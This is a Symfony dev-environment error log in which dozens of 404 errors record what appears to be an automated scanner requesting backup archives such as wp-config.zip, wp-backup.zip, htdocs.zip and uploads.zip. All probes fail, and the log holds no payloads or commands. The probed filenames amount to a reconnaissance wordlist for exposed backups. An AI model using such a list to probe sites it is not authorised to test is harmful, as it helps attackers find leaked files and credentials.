  7558. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /root.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /root.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7559. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7560. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wwwroot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wwwroot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7561. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clients.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clients.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7562. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7563. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7564. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /inetpub.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /inetpub.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7565. [2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /client.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /client.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7566. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7567. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7568. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7569. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /website.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /website.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7570. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /portal.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /portal.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7571. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7572. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /htdocs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /htdocs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7573. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7574. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7575. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7576. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7577. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7578. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7579. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7580. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7581. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /uploads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /uploads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7582. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7583. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /upload.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /upload.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7584. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /media.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /media.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7585. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7586. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7587. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /documents.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /documents.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7588. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /gallery.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /gallery.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7589. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /content.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /content.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7590. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7591. [2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /attachments.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /attachments.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7592. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /photos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /photos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7593. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /audio.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /audio.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7594. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7595. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7596. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7597. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /downloads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /downloads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7598. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7599. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7600. [2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /services.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /services.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
